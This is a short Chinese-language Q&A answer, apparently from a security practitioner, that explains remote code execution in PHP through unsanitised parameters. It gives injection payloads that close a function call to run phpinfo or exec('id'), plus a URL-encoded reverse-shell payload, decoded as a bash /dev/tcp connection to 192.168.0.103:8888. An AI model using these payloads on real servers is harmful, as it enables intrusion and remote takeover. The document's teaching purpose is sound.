和命令执行差不多，它们都可以称作RCE，是2023年护网时候最重要的漏洞利用方式之一。是指程序代码在处理输入/输出的时候，没有严格控制，可以构造参数包含代码，在服务器上执行，进而获得服务器的权限。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

举个例子，一段代码，程序员的思维是传个参数，然后将其打印出来，作为测试的你传进去100，它能正常工作。

但是作为黑客的你偏偏不走寻常路，传进去);phpinfo( ，它就变成了代码执行了。

你可以随意的上传代码，比如 );echo%20exec(%27id%27);var_dump( 就可以看到网站的权限。

如果你输入 );exec(%27bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.0.103%2F8888%200>%261"%27 ，那么将直接反弹shell。

输入解码之后是这样的： bash -c "bash -i >& /dev/tcp/192.168.0.103/8888 0>&1"